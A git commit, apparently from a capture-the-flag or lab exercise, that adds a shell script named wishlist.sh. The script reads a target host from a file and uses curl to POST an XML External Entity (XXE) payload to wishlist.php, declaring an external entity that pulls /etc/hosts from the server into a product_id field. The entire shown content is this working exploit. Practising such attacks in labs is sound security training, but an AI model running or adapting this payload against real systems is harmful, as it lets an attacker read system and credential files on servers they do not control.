batman

2024-12-08 17:19:06 +01:00
commit 8ffc4db7a8
9 changed files with 269 additions and 0 deletions
--- a/5/wishlist.sh
+++ b/5/wishlist.sh
@@ -0,0 +1,12 @@
+#!/bin/sh
+target=`cat trgt`
+curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
+ -d '<!--?xml version="1.0" ?-->
+<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
+<wishlist>
+  <user_id>1</user_id>
+     <item>
+       <product_id>&payload;</product_id>
+     </item>
+</wishlist>'
+